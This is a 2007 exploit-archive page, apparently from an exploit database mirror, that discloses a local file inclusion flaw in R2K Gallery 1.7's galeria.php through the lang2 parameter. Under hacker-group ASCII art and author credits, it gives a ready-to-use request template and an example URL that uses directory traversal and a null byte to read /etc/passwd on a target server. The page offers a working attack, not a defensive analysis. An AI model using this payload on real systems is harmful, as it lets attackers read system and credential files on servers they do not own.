R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability
# Published : 2007-05-11
# Author : Dj7xpl
# Previous Title : maGAZIn 2.0 (phpThumb.php src) Remote File Disclosure Vulnerability
# Next Title : Monalbum 0.8.7 Remote Code Execution Exploit

\|///
      \  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
      (       ) /
      _)     (_/

---------------------------------------------------------------------

[!] Portal   :   R2K Gallery v1.7
[!] Download :   http://usuarios.lycos.es/r2kscripts/
[!] Type     :   Local File Include Vuln

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]

Example :

http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00

---------------------------------------------------------------------

# www.Syue.com [2007-05-11]